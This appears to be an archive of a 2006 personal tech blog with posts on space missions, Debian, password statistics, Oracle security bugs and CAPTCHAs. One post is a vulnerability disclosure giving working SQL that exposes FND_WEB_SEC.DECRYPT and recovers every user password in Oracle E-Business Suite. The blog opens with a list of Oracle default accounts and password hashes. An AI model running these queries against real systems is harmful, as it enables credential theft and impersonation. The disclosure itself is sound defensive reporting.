OR (username = 'SYS' AND password = '1FA22316B703EBDD')
OR (username = 'SYS' AND password = '12CFB5AE1D087BA3')
OR (username = 'SYS' AND password = '380E3D3AD5CE32D4')
OR (username = 'SYS' AND password = '2563EFAAE44E785A')
OR (username = 'SYS' AND password = 'E7686462E8CD2F5E')
OR (username = 'SYS' AND password = '691C5E7E424B821A')
OR (username = 'ORDPLUGINS' AND password = '88A2B2C183431F00')
OR (username = 'ORDSYS' AND password = '7EFA02EC7EA6B86F')
OR (username = 'OSE$HTTP$ADMIN' AND password = '05327CD9F6114E21')
OR (username = 'WWW' AND password = '6DE993A60BC8DBBF');






COROT launch

On 27 December, COROT is to be launched into space on a unique astronomy mission: its twin goals are to detect exoplanets orbiting around other stars and to probe the mysteries of stellar interiors as never before. COROT is a French national space agency (CNES)-led mission to which the European Space Agency and European partners are adding a particularly strong international flavour.

While CNES is completing preparations for the launch from Baikonur/Kazakhstan, ESA and a large number of European scientists involved in the mission are eagerly awaiting this event and the first scientific results to come through.


What is COROT?

COROT stands for ‘Convection Rotation and planetary Transits’. The name describes the mission’s scientific goals. ‘Convection and rotation’ refer to the satellite’s capability to probe stellar interiors, studying the acoustic waves that ripple across the surface of stars, a technique called asteroseismology. ‘Transit’ refers to the technique whereby the presence of a planet orbiting a star can be inferred from the dimming starlight caused when the planet passes in front of it. To achieve its twin scientific objectives, COROT will monitor some 120,000 stars with its 30-centimetre telescope.

COROT will lead a bold new search for planets around other stars. In the decade since the first discovery in 1995 of an exoplanet 51 Pegasi b, more than 200 other such planets outside our solar system have been detected using ground-based observatories. The COROT space telescope promises to find many more during its two-and-a-half-year mission, expanding the frontiers of our knowledge towards ever-smaller planets.

Many of the planets COROT will detect are expected to be 'hot Jupiters', gaseous worlds. An unknown percentage of those detected are expected to be rocky planets, maybe just a few times larger than the Earth (or smaller, even). If COROT finds such planets, they will constitute a new class of planet altogether.

While it is looking at a star, COROT will also be able to detect 'starquakes', acoustic waves generated deep inside a star that send ripples across its surface, altering its brightness. The exact nature of the ripples allows astronomers to calculate the star's precise mass, age and chemical composition.

COROT’s European dimension

The COROT mission was first proposed by CNES back in 1996. A call for potential European partners was issued in 1999. CNES gave the green light to build the spacecraft in 2000 and is now leading the mission. Its international partners are ESA, Austria, Belgium, Germany, Spain and Brazil.

CNES is responsible for the overall system and for the launch contract with Franco-Russian company Starsem, which is providing the Soyuz launch service.

The contributions of the other international partners range from the provision of hardware items to ground stations, complementary ground-based observation of targets to be studied by COROT and analysis of the scientific data to come.

ESA is playing a crucial role in the mission. It has contributed the optics for the telescope positioned at the heart of the spacecraft and has carried out payload testing. The telescope's baffle was developed by a team at ESA's technical centre ESTEC. ESA has also provided the onboard data processing units. And under this truly collaborative effort, a number of scientists from various European countries - Denmark, Switzerland, the United Kingdom and Portugal - have been selected as Co-Investigators following open competition. As a result of ESA's participation, scientists from its Member States will also be given access to COROT data.

Hitchhiking around in Europe.

Hitchhiking: for some people it sounds romantic, for some it sounds like something for a hippy, and for some it sounds like the start of a competition.

I think I will fit into the last category. I have hitchhiked around Europe myself several times, sometimes to get a quick, cheap and exciting trip to the other side of Europe, in other cases to get as fast as possible to the other side of Europe in a competition. Before it became a TV show we were traveling for free over the roads of Europe.

I just found that the website of the hitchhiking race is still up and running. Take a look especially for the nice pictures.


Friday, December 22, 2006

VGA=771 parameter for Debian installation.

So it turns out that in the end my installation of Debian Sarge on my HP Pavilion ZE2000 laptop could be done by using the parameter VGA=771.

I have been trying to install a Debian Sarge distribution on this laptop and encountered the problem that after the first steps of the installation the system would freeze and give a black screen.

Consulting the help files gave the hint that starting with the parameter VGA=771 could bypass a common laptop problem of not recognizing the screen and resolution type during boot.

The `vga=' Argument:
Note that this is not really a boot argument. It is an option that is interpreted by LILO and not by the kernel like all the other boot arguments are. However its use has become so common that it deserves a mention here. It can also be set via using rdev -v or equivalently vidmode on the vmlinuz file. This allows the setup code to use the video BIOS to change the default display mode before actually booting the Linux kernel. Typical modes are 80x50, 132x44 and so on. The best way to use this option is to start with vga=ask which will prompt you with a list of various modes that you can use with your video adapter before booting the kernel. Once you have the number from the above list that you want to use, you can later put it in place of the `ask'. For more information, please see the file linux/Documentation/svga.txt that comes with all recent kernel versions.

Note that newer kernels (v2.1 and up) have the setup code that changes the video mode as an option, listed as Video mode selection support so you need to enable this option if you want to use this feature.

Wednesday, December 20, 2006

Real-World Passwords.

This article was originally written by Bruce Schneier, founder and CTO of BT Counterpane, and appeared in the CRYPTO-GRAM newsletter. CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

How good are the passwords people are choosing to protect their computers and online accounts?

It's a hard question to answer because data is scarce. But recently, a colleague sent me some spoils from a MySpace phishing attack: 34,000 actual user names and passwords.

The attack was pretty basic. The attackers created a fake MySpace login page, and collected login information when users thought they were accessing their own account on the site. The data was forwarded to various compromised web servers, where the attackers would harvest it later.

MySpace estimates that more than 100,000 people fell for the attack before it was shut down. The data I have is from two different collection points, and was cleaned of the small percentage of people who realized they were responding to a phishing attack. I analyzed the data, and this is what I learned.

Password Length: While 65% of passwords contain eight characters or less, 17% are made up of six characters or less. The average password is eight characters long.

Specifically, the length distribution looks like this:

1-4 0.82%
5 1.1%
6 15%
7 23%
8 25%
9 17%
10 13%
11 2.7%
12 0.93%
13-32 0.93%

Yes, there's a 32-character password:
"1ancheste23nite41ancheste23nite4." Other long passwords are "fool2thinkfool2thinkol2think" and "dokitty17darling7g7darling7."

Character Mix: While 81% of passwords are alphanumeric, 28% are just lowercase letters plus a single final digit -- and two-thirds of those have the single digit 1. Only 3.8% of passwords are a single dictionary word, and another 12% are a single dictionary word plus a final digit -- once again, two-thirds of the time that digit is 1.

numbers only 1.3%
letters only 9.6%
alphanumeric 81%
non-alphanumeric 8.3%

Only 0.34% of users have the username portion of their e-mail address as their password.

Common Passwords: The top 20 passwords are (in order): password1, abc123, myspace1, password, blink182, qwerty1, fuckyou, 123abc, baseball1, football1, 123456, soccer, monkey1, liverpool1, princess1, jordan23, slipknot1, superman1, iloveyou1 and monkey.

The most common password, "password1," was used in 0.22% of all accounts. The frequency drops off pretty fast after that: "abc123" and "myspace1" were only used in 0.11% of all accounts, "soccer" in 0.04% and "monkey" in 0.02%.

For those who don't know, Blink 182 is a band. Presumably lots of people use the band's name because it has numbers in its name, and therefore it seems like a good password. The band Slipknot doesn't have any numbers in its name, which explains the 1. The password "jordan23" refers to basketball player Michael Jordan and his number. And, of course, "myspace" and "myspace1" are easy-to-remember passwords for a MySpace account. I don't know what the deal is with monkeys.

We used to quip that "password" is the most common password. Now it's "password1." Who said users haven't learned anything about security?

But seriously, passwords are getting better. I'm impressed that less than 4% were dictionary words and that the great majority were at least alphanumeric. Writing in 1989, Daniel Klein was able to crack 24% of his sample passwords with a small dictionary of just 63,000 words, and found that the average password was 6.4 characters long.

And in 1992 Gene Spafford cracked 20% of passwords with his dictionary, and found an average password length of 6.8 characters. (Both studied Unix passwords, with a maximum length at the time of 8 characters.) And they both reported a much greater percentage of all lowercase, and only upper- and lowercase, passwords than emerged in the MySpace data. The concept of choosing good passwords is getting through, at least a little.

On the other hand, the MySpace demographic is pretty young. Another password study in November looked at 200 corporate employee passwords: 20% letters only, 78% alphanumeric, 2.1% with non-alphanumeric characters, and a 7.8-character average length. Better than 15 years ago, but not as good as MySpace users. Kids really are the future.

None of this changes the reality that passwords have outlived their usefulness as a serious security device. Over the years, password crackers have been getting faster and faster. Current commercial products can test tens -- even hundreds -- of millions of passwords per second. At the same time, there's a maximum complexity to the passwords average people are willing to memorize. Those lines crossed years ago, and typical real-world passwords are now software-guessable. AccessData's Password Recovery Toolkit -- at 200,000 guesses per second -- would have been able to crack 23% of the MySpace passwords in 30 minutes, 55% in 8 hours. Of course, this analysis assumes that the attacker can get his hands on the encrypted password file and work on it offline, at his leisure; i.e., that the same password was used to encrypt an e-mail, file or hard drive. Passwords can still work if you can prevent offline password-guessing attacks, and watch for online guessing. They're also fine in low-value security situations, or if you choose really complicated passwords and use something like Password Safe to store them. But otherwise, security by password alone is pretty risky.

MySpace Attack
http://www.infoworld.com/infoworld/article/06/10/27/HNphishingmyspace_1.html
http://news.netcraft.com/archives/2006/10/27/myspace_accounts_compromised_by_phishers.html
http://www.securiteam.com/securitynews/6O00M0AHFW.html

Another analysis of the same data:
http://www.infoworld.com/article/06/11/17/47OPsecadvise_1.html

Other password studies:
http://www.deter.com/unix/papers/passwords_klein.ps.gz
http://ftp.cerias.purdue.edu/pub/papers/gene-spafford/spaf-OPUS-observe.pdf
http://www.fredstie.com/thesis/survey/survey_report.pdf
http://download.lawr.ucdavis.edu/pub/CambridgePWStudy.pdf

Password cracking:
http://www.lockdown.co.uk/?pg=combi&s=articles
http://www.accessdata.com/products/decryption/

Password Safe:
http://passwordsafe.sourceforge.net/

This essay originally appeared on Wired.com.
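The measurements reported in the essay above (length buckets, character mix, the "lowercase letters plus one final digit" pattern, dictionary words) and its 200,000-guesses-per-second figure can be reproduced with a short script. This is an added example, not code from the essay or from this blog; the sample passwords, the word list and all function names are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample: a few entries from the essay's top-20 list plus
# made-up passwords, so every category is exercised.
SAMPLE = [
    "password1", "abc123", "myspace1", "blink182", "soccer", "123456",
    "monkey", "Tr0ub4dor&3", "sunshine7", "letmein!", "qwerty1", "a1b2",
]
# Tiny constructed word list standing in for a real dictionary file.
WORDS = {"password", "soccer", "monkey", "sunshine", "baseball"}


def length_bucket(pw):
    """Map a password to the length buckets used in the essay's table."""
    n = len(pw)
    if n <= 4:
        return "1-4"
    if n >= 13:
        return "13-32"  # the essay's top bucket; longer input also lands here
    return str(n)


def char_mix(pw):
    """Classify into the essay's four disjoint character-mix classes."""
    if re.fullmatch(r"[0-9]+", pw):
        return "numbers only"
    if re.fullmatch(r"[A-Za-z]+", pw):
        return "letters only"
    if re.fullmatch(r"[A-Za-z0-9]+", pw):
        return "alphanumeric"  # letters and digits mixed
    return "non-alphanumeric"


def audit(passwords, words):
    """Count the weak patterns the essay measures; returns plain counts."""
    report = {
        "total": len(passwords),
        "length": Counter(length_bucket(p) for p in passwords),
        "mix": Counter(char_mix(p) for p in passwords),
        "lower_plus_digit": 0,      # e.g. "qwerty1"
        "lower_plus_digit_1": 0,    # ... where that digit is 1
        "dict_word": 0,             # e.g. "monkey"
        "dict_word_plus_digit": 0,  # e.g. "password1"
    }
    for p in passwords:
        if re.fullmatch(r"[a-z]+[0-9]", p):
            report["lower_plus_digit"] += 1
            if p.endswith("1"):
                report["lower_plus_digit_1"] += 1
        if p.lower() in words:
            report["dict_word"] += 1
        elif p[-1:].isdigit() and p[:-1].lower() in words:
            report["dict_word_plus_digit"] += 1
    return report


def worst_case_seconds(alphabet_size, max_len, guesses_per_second=200_000):
    """Time to try every string of length 1..max_len over the alphabet.

    200,000 guesses/second is the rate the essay quotes for an offline
    attack; the exhaustive-search model is a simplification, since real
    crackers try likely candidates first and finish much sooner.
    """
    candidates = sum(alphabet_size ** k for k in range(1, max_len + 1))
    return candidates / guesses_per_second


def percent(count, total):
    """Share of the sample as a percentage, rounded to one decimal."""
    return round(100.0 * count / total, 1) if total else 0.0


if __name__ == "__main__":
    r = audit(SAMPLE, WORDS)
    for name, count in r["mix"].most_common():
        print(f"{name:18s} {percent(count, r['total'])}%")
    print("lowercase + one final digit:", r["lower_plus_digit"])
    print("six lowercase letters, worst case: "
          f"{worst_case_seconds(26, 6) / 60:.0f} minutes")
```

Under this model every lowercase password of up to six letters is exhausted in about 27 minutes at the quoted rate, which is why the length and character-mix counts matter once an offline attack is possible.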

Asteroid Detection by Radar

They are the celestial equivalent of sonograms. But their hazy outlines and ghostly features do not document the in-vivo development of a future taxpayer. Instead, they chronicle the exo-planetary comings-and-goings of some of Earth's least known, most nomadic, and at times most impactful neighbors.

They are radar echoes that are bounced off of asteroids. Scientists from NASA's Jet Propulsion Laboratory and around the world rely on their ethereal images to tell some out-of-this-world tales of near-Earth objects.

"The standard ground-based tools for asteroid science require a night's sky, and what you come away with in the end is an image of a dot," said JPL radar astronomer Dr. Steve Ostro. "With radar astronomy, the sky at high noon is just as inviting as that at midnight, and without launching a full-blown space mission we can actually get valuable information about the physical makeup of these objects."

In some respects, radar astronomy utilizes the same technology as your microwave oven. But do not bother to haul your glorified croissant warmer outside -- it will just confuse the neighbors. Radar astronomy employs the world's most massive dish-shaped antennas, which beam directed microwave signals at their targets, which can be as close as our moon and as far away as the moons of Saturn. These pulses bounce off the target, and the resulting "echo" is collected and precisely collated. The results can be astounding.

"The closer the target, the better the echo," said Ostro. "From them we can generate detailed three-dimensional models of the object, define its rotation precisely and get a good idea of its internal density distribution. You can even make out surface features. A good echo can give us a spatial resolution finer than 10 meters."

Radar astronomy has detected echoes from over 190 near-Earth asteroids to date and has found that, like snowflakes, no two are the same. The returning echoes have revealed both stony and metallic objects, some flying through the cold, dark reaches of space alone, while others have their own satellites. The data indicate that some asteroids have a very smooth surface, while others have very coarse terrain. And finally, their shapes are virtually anything that can be imagined.

One thing that does not have to be imagined is radar astronomy's ability to nail down the location of an object in time and space. This invaluable capability came in handy in the winter of 2004 when JPL's Near-Earth Object office was looking for a potentially hazardous asteroid called Apophis.

Discovered by astronomers using optical telescopes, Apophis quickly drew the interest of the near-Earth object monitoring community when its initial orbital plots indicated there was a possibility the 1,300-foot-wide chunk of space rock could impact Earth in 2029. The Near-Earth Object office knew what was needed was more detailed information about Apophis' location, which they could then use to plot out a more accurate orbit.

Under the watchful eye of Ostro and three other radar astronomers, microwaves from the Arecibo Observatory in Puerto Rico reached out and touched asteroid Apophis on Jan. 27, 29, and 30, 2005. The Arecibo data significantly improved the asteroid's orbital estimate, ruling out a potential Earth collision in 2029.

The 1,000-foot diameter Arecibo telescope is one of only two places in the world where radar astronomy is effectively performed. The other is at the 70-meter Goldstone antenna in California's Mojave Desert. The two instruments are complementary. The Arecibo radar is not fully steerable (while Goldstone is), but it is 30 times more sensitive. Together they make a formidable asteroid reconnaissance team.

The future of radar astronomy may be just as amazing as some of the images and shape models of nearby space objects that its practitioners have already obtained. There is new technology in the pipeline that will allow imaging of surface features with up to four times more detail than what exists today. And then there are proposals on the table for a potential space mission to a near-Earth asteroid. Candidate asteroids for said mission will need to be pre-approved via detailed scientific analysis. The kind of scientific analysis you can only get with radar astronomy.

Monday, December 18, 2006

Download Adobe Photoshop CS3 Beta

For the first time ever, Adobe is delivering a widely available Photoshop CS3 beta to enable customers to more easily transition to the latest hardware platforms, particularly Apple's new Intel based systems. The beta is available as a Universal Binary for the Macintosh platform as well for Microsoft Windows XP and Windows Vista computers, with the final shipping release of Adobe Photoshop CS3 planned for spring 2007.

The Photoshop CS3 beta is available in English only but to Photoshop CS2 users worldwide. It is available to licensed users of either the Photoshop CS2 (full, upgrade, and education), Adobe Creative Suite 2 Standard or Premium (full, upgrade, and education), Adobe Production Studio Standard and Premium (full, upgrade, and education), Adobe Video Bundle (full, upgrade, and education) or Adobe Web Bundle (full, upgrade, and education). You will need to provide your Photoshop CS2, Creative Suite, Production Studio or Bundle serial number in order to get a Photoshop CS3 beta serial number, enabling you to activate the Photoshop beta and use it beyond the two-day grace period.

You can download the software from the Adobe Labs website.

flickr.com

It took some time but finally I have joined the Flickr community. Last weekend I devoted some time to cleaning my disks and found a lot of photos that were still there and which I still wanted to show to some people. Also a lot of photos which I made for some reason resided on my disks.

I decided to clean up some of the mess and make a centralized online storage location. I looked into some possibilities of hosting them on the terminalcult webserver. However, keeping up with patching, maintaining and the like made me decide to give Flickr a try. I have to say, until now I think it is quite a nice web interface; there are some disadvantages with a non-paying account but I think I can live with those for now.

My photos can be found at: http://www.flickr.com/photos/14436073@N00/


Sunday, December 17, 2006

CERT is picking up speed.

As you have been able to read in this blog I have found 2 separate security bugs in Oracle Software. One security bug is about Oracle iStore where users are able to view the order information of other customers. This is enabling a user to view what all other customer have purchased, to which address it is shipped and to which address the bill is send. Also the cost information and what kind of payment type there was used, credit card for example. The security bug is simply to exploit on every webshop that is making use of Oracle iStore and did not enable URL encryption.

The solution is somewhat vague in mentioned in the Oracle iStore implementation guide. It can be found under the section of cookie encryption. By enabling the encryption in the CRM module the URL’s will also be partly encrypted and prevent users from URL manipulation. However this is still not a complete solution but rather a workaround in my opinion. On my website you can find some hints about how you can make a more stable fix.

The second security bug is about a password decryption vulnerability in Oracle E-Business Suite. By manipulating a PL/SQL package someone can decrypt all stored user passwords. By using a java function you can even bypass this manipulation of the PL/SQL package and do it on a separate computer. This is compromising the integrety of the E-Business Suite and makes it possible for users to pretend that they are a other user. For example upgrading there salary scale as if they where someone of the Human Resource department or give huge discounts on products for particular customers. That is besides the potential danger of people leaking information. I have described the bug in somewhat more detail in this posting.

Because of the potential danger of both the bugs I have send out separate mails to CERT and the Dutch CERT to inform them about the bugs. From both I have received mails back. The Dutch reported that they have noted the bug and that they would inform Oracle, after this only silence was heard. The American CERT organization however send me a mail that they received the security thread mail and gave me 2 separate tracking numbers to which I could refer when I communicated with them about this. Not only that but at this moment I keep receiving mails from CERT about the bugs, and I some questions from Oracle about some technical details of the bug and how to solve this in the best way. So CERT is playing the middle man in the solving of this thread. I still have to wait and see what will come out of this and if Oracle will release a patch but I surely hope so, especially for the iStore bug because at this moment there are several web stores active that are vulnerable to this exploit.

Also I noted that the number of visitors to my website terminalcult.org and to this weblog has grown enormously, and a large number of these visitors are coming from the Oracle company. It is still a shame that I have not had direct contact with Oracle and that CERT is still playing the middle man. I understand this and it might be a good solution; however, it might speed things up if there were some more direct contact. We will wait and see how things play out in the upcoming days.


Thursday, December 14, 2006

Sun Solaris 10 V11/06

As some of you may or may not know, I am a member of the Sun Microsystems Operating System Beta test team, meaning that we test Sun Solaris before it becomes available to the general public. I am very happy to announce that a new version is shipping. See also the mail about it:


From: Wyatt Gale [mailto:XXXXXXXX@sun.com]
Sent: Monday, 11 December 2006 21:42
To: Johan Louwers
Subject: Solaris 10 11/06 RR

Dear Johan

We are pleased to announce the successful RR of the Solaris 10 11/06.

Solaris 10 11/06 downloadable images are located at the following URL: http://www.sun.com/software/solaris/

Thank You
Solaris 10 11/06 Beta Program Management



This means you can download the latest version of Sun Solaris 10 V11/06 from the following location: http://www.sun.com/software/solaris/



Monday, December 11, 2006

Oracle Applications Passwords Decryption Vulnerability.

Oracle Applications is currently one of the leading ERP systems and is used by medium and large sized companies around the world. As those companies rely on this ERP platform for their day-to-day business, they also put their trust in the way Oracle Applications handles security and authentication. Whether this trust is based on hard facts or on a feeling is questionable; looking at the authentication mechanism, it appears to be based on a feeling.

As part of a customization project I had to take a close look at the way Oracle Applications creates new user accounts. What made me investigate the user authentication mechanism more deeply was the discovery that Oracle Apps does not store a hash value of the password; instead, Oracle stores the complete password in encrypted form in the database. The encrypted passwords can be found by querying the FND_USER table:

/*--------------------------------------------------------------*/
select * from fnd_user;
/*--------------------------------------------------------------*/

As there is no password hash stored, user authentication has to be done against the real password. To compare the password entered by the user with the stored encrypted password, Oracle first decrypts the stored password, which means the mechanism must have access to a decryption algorithm. To decrypt and verify user passwords, Oracle Apps makes use of the FND_WEB_SEC package, which can be found in the Oracle Apps schema. The DECRYPT function in the FND_WEB_SEC package is a local function and cannot be called from outside the package:

/*--------------------------------------------------------------*/
-- Decrypt function in the FND_WEB_SEC package.
function decrypt(key in varchar2, value in varchar2)
return varchar2
as language java name 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
/*--------------------------------------------------------------*/

To make the function available outside the package, the package specification has to be altered and the following lines have to be added to it:

/*--------------------------------------------------------------*/
function decrypt(key in varchar2, value in varchar2)
return varchar2;
/*--------------------------------------------------------------*/

After altering this we have access to the DECRYPT function from outside the package and we can call the function and use it. For the function to work correctly there are two required values, the first value is the decryption key the second is the encrypted password which you want to be decrypted. The encrypted password can be found under “FND_USER.ENCRYPTED_USER_PASSWORD”. The decryption key for the user password is the decrypted “ENCRYPTED_FOUNDATION_PASSWORD” of the guest user.

This means that the first step in decrypting a user password is to decrypt the foundation password of the guest user. When Oracle Apps verifies a login attempt it also needs to perform these steps, so we can find the standard Oracle approach to decrypting the foundation password in the FND_WEB_SEC package, in the function “get_foundation_password”.

Looking at the FND_WEB_SEC.get_foundation_password function teaches us that the decryption key to decrypt “ENCRYPTED_FOUNDATION_PASSWORD” of the guest user is the password of the guest user. This password is stored, together with the username of the guest user, under the Oracle profile option GUEST_USER_PWD. Executing the following query can retrieve the profile option value.

/*--------------------------------------------------------------*/
SELECT upper(fnd_profile.value('GUEST_USER_PWD')) FROM dual;
/*--------------------------------------------------------------*/

Having the value of this profile option will enable you to decrypt the foundation password of the guest user, which can be used as the decryption key for the other user passwords. In the example below the foundation password of the guest user is retrieved from the database:

/*--------------------------------------------------------------*/
SELECT(
SELECT
fnd_web_sec.decrypt(
UPPER((SELECT upper(fnd_profile.value('GUEST_USER_PWD')) FROM dual))
,usertable.encrypted_foundation_password)
FROM dual
) AS apps_password
FROM
fnd_user usertable
WHERE
usertable.user_name LIKE upper(
(SELECT
substr(fnd_profile.value('GUEST_USER_PWD'),1,instr(fnd_profile.value('GUEST_USER_PWD'),'/')-1)
FROM dual)
)
/*--------------------------------------------------------------*/

Having this password/decryption key, you can now start decrypting all the other user passwords. To make things somewhat easier you can execute the following query, which will ask you for a username and return the decrypted password of that user account.

/*--------------------------------------------------------------*/
SELECT
usertable.user_name
,(SELECT
fnd_web_sec.decrypt(UPPER((
SELECT(
SELECT
fnd_web_sec.decrypt(UPPER(
(SELECT upper(fnd_profile.value('GUEST_USER_PWD')) FROM dual)
)
,usertable.encrypted_foundation_password)
FROM dual
) AS apps_password
FROM
fnd_user usertable
WHERE
usertable.user_name LIKE upper(
(SELECT
substr(fnd_profile.value('GUEST_USER_PWD'),1,instr(fnd_profile.value('GUEST_USER_PWD'),'/')-1)
FROM dual)
)
)
),usertable.encrypted_user_password)
FROM
dual
) AS encrypted_user_password
FROM
fnd_user usertable
WHERE
usertable.user_name LIKE upper('&username')
/*--------------------------------------------------------------*/

This, however, has still only returned the user password of a user account. If you also want the decrypted foundation password of a user account, we have to take a closer look at the way the foundation passwords for a user account are decrypted. First take a close look at the way the user foundation password is encrypted by Oracle:

/*--------------------------------------------------------------*/
encFndPwd := encrypt(user||'/'||pwd,fndPwd);
/*--------------------------------------------------------------*/

This shows us that the combination username / password is used to encrypt the foundation password. As we have already decrypted the user password and we know the username, we can easily combine those to get the decryption key. However, there is no real use in decrypting the foundation password of the user account, because it will be exactly the same foundation password as the one for the guest user. Oracle uses this mechanism to obtain the user foundation password with only the knowledge of the username and password given by the user who tries to log in. Using those queries you will be able to decrypt all user passwords available in the FND_USER table.

In my opinion this way of encrypting and storing passwords is so insecure that it is almost unacceptable. Oracle will most likely argue that people having access to the FND_WEB_SEC package under the apps schema are the only people able to use this exploit. However, in a normal business environment this goes for almost every apps programmer and consultant who needs access to the apps schema to be able to develop new functions in the development environment. If the company's procedures do not require the passwords to be reset when a system is cloned from a production environment to a development environment, this can cause a serious security risk.
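The access question raised above can be checked from the data dictionary. The queries below are an added audit example, not part of the original post and not Oracle's own tooling; they assume the package lives in the APPS schema as described in the post and that the session may read the DBA_* dictionary views.

```sql
-- Added audit example. Assumptions: schema owner APPS (as in the post),
-- session with SELECT access to the DBA_* dictionary views.

-- 1. Subprograms listed in DBA_PROCEDURES for a package are the ones
--    declared in its specification, i.e. callable from outside it.
--    The post describes DECRYPT as local, so a row here means the
--    specification has been changed to expose it.
SELECT owner, object_name, procedure_name
FROM   dba_procedures
WHERE  owner          = 'APPS'
AND    object_name    = 'FND_WEB_SEC'
AND    procedure_name = 'DECRYPT';

-- 2. Specification lines that mention DECRYPT, for manual review.
SELECT line, text
FROM   dba_source
WHERE  owner = 'APPS'
AND    name  = 'FND_WEB_SEC'
AND    type  = 'PACKAGE'
AND    UPPER(text) LIKE '%DECRYPT%'
ORDER  BY line;

-- 3. When the specification and body were last altered or recompiled.
--    Compare LAST_DDL_TIME with the last approved patch or change window.
SELECT object_type, status, created, last_ddl_time
FROM   dba_objects
WHERE  owner       = 'APPS'
AND    object_name = 'FND_WEB_SEC'
AND    object_type IN ('PACKAGE', 'PACKAGE BODY');

-- 4. Accounts other than the owner that may execute the package.
SELECT grantee, privilege, grantor
FROM   dba_tab_privs
WHERE  owner      = 'APPS'
AND    table_name = 'FND_WEB_SEC'
AND    privilege  = 'EXECUTE';
```

Running the same checks on every clone of production shows whether development copies have drifted from the production package definition.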

A better way of handling the encryption and storage of the user passwords would be to simply store hash values of the user passwords, or to use a random value for the foundation password. The decrypted random foundation password can then be used as a decryption key to decrypt the user password and verify that it is the same as the password given by the user attempting to log in.

In my opinion, looking at this mechanism proves that the security of Oracle Applications has to be improved, and that the trust placed in this mechanism is based upon a feeling and not upon good research by the companies relying on this security for their day-to-day business.

I reported the problem to Oracle a couple of months ago but never received a response. This is the reason I decided to post these results on my weblog, in the hope that some developer can come up with a solution, or that Oracle finally picks this up and comes up with a suitable solution.

Saturday, December 09, 2006

CAPTCHA = Computer or Human

When you are running a popular online application you might be suffering from people writing computer programs that interact with your application in an undesired way. Take for example blogger.com: they have the problem that their platform is used by spammers and by people promoting their own website by setting up a fake weblog that is used only once and forwards the traffic to, for example, an adult website.

In those cases the people who are using the system for this purpose want to create a large number of weblogs in an automated way, because the volume is too high to be done manually. Creating a thousand new weblogs, for example, is not a job that can easily be done by hand. If you have ever developed a web application, or if you think for a moment about how you could automate such a procedure, you will find that this can be done quite easily.

To prevent such use of the system and to keep automated processes out, you, as a developer, will need a way to tell the difference between a “hostile” automated process and a real user. This is the point where it gets tricky: all the traffic will, most likely, be HTTP traffic with GETs and POSTs. So from the nature of the traffic there is no way of telling the difference between a human and a computer.

For the purpose of telling the difference between humans and computers there is a thing we call CAPTCHA. Most likely you have already used a captcha several times without knowing that it was one. You can find them when you fill in an online registration form when applying for a Hotmail account or a Google Gmail account, or even when you post to your weblog.

A captcha is the name for the little box with characters that you are required to type into a textbox. Most of the time the letters are strangely curled and there is a lot of background noise in the picture. Because of this, automated systems are unable to recognize which letters are in the picture. Only humans are able to tell, by visual confirmation.

Since CAPTCHAs are based on open problems in artificial intelligence (AI), they also offer well-defined challenges for the AI community, and induce security researchers, as well as otherwise malicious programmers, to advance the field of AI. (This is similar to research in cryptography advancing algorithms for factoring large numbers.) Several groups have created programs that can pass many CAPTCHAs over 80% of the time (see below). These algorithms represent significant progress in the area of text recognition. CAPTCHAs are thus a win-win situation: either a CAPTCHA is not broken and there is a way to differentiate humans from computers, or the CAPTCHA is broken and an AI problem is solved. Using harder AI problems, our newly developed CAPTCHAs are still not broken.

Greg Mori and Jitendra Malik of the University of California at Berkeley have written a program that can solve ez-gimpy with accuracy 83%. Thayananthan, Stenger, Torr, and Cipolla of the Cambridge vision group have written a program that can achieve 93% correct recognition rate against ez-gimpy, and Malik and Mori have matched their accuracy. Their programs represent significant advancements to the field of computer

Also interesting to watch is the talk given by Luis von Ahn at the Google TechTalk of July 26, 2006. Luis von Ahn is an assistant professor in the Computer Science Department at Carnegie Mellon University, where he also received his Ph.D. in 2005. Previously, Luis obtained a B.S. in mathematics from Duke University in 2000. He is the recipient of a Microsoft Research Fellowship.

ABSTRACT Tasks like image recognition are trivial for humans, but continue to challenge even the most sophisticated computer programs. This talk introduces a paradigm for utilizing human processing power to solve problems that computers cannot yet solve. Traditional approaches to solving such problems focus on improving software. I advocate a novel approach: constructively channel human brainpower using computer games. For example, the ESP Game, described in this talk, is an enjoyable online game -- many people play over 40 hours a week -- and when people play, they help label images on the Web with descriptive keywords. These keywords can be used to significantly improve the accuracy of image search. People play the game not because they want to help, but because they enjoy it.

I describe other examples of "games with a purpose": Peekaboom, which helps determine the location of objects in images, and Verbosity, which collects common-sense knowledge. I also explain a general approach for constructing games with a purpose